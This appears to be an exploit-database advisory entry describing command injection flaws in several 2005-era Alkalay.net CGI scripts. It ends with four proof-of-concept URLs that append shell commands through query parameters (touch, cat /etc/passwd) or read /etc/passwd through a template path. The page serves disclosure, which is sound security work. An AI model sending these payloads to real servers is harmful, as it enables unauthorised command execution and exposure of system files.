Multiple Alkalay.net Scripts Arbitrary Remote Command Execution Vulnerability

vendor:

Multiple Scripts

by:

SecurityFocus

7.5

CVSS

HIGH

Arbitrary Remote Command Execution

CWE

Product Name: Multiple Scripts

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Multiple Alkalay.net Scripts Arbitrary Remote Command Execution Vulnerability

Multiple Alkalay.net scripts are prone to arbitrary remote command execution vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. An attacker can prefix arbitrary commands with the pipe '|' character and have them executed in the context of the Web server process.

Mitigation:

Input validation should be used to ensure that user-supplied data does not include malicious commands.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14893/info

Multiple Alkalay.net scripts are prone to arbitrary remote command execution vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input.

An attacker can prefix arbitrary commands with the pipe '|' character and have them executed in the context of the Web server process.

http://www.example.com/cgi-bin/man-cgi?section=0&topic=ls;touch%20/tmp/test
http://www.example.com/cgi-bin/nslookup.cgi?query=example.com%3B/bin/cat%20/etc/passwd&type=ANY&ns=
http://www.example.com/cgi-bin/contribute.pl?template=/etc/passwd&contribdir=.
http://www.example.com/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=.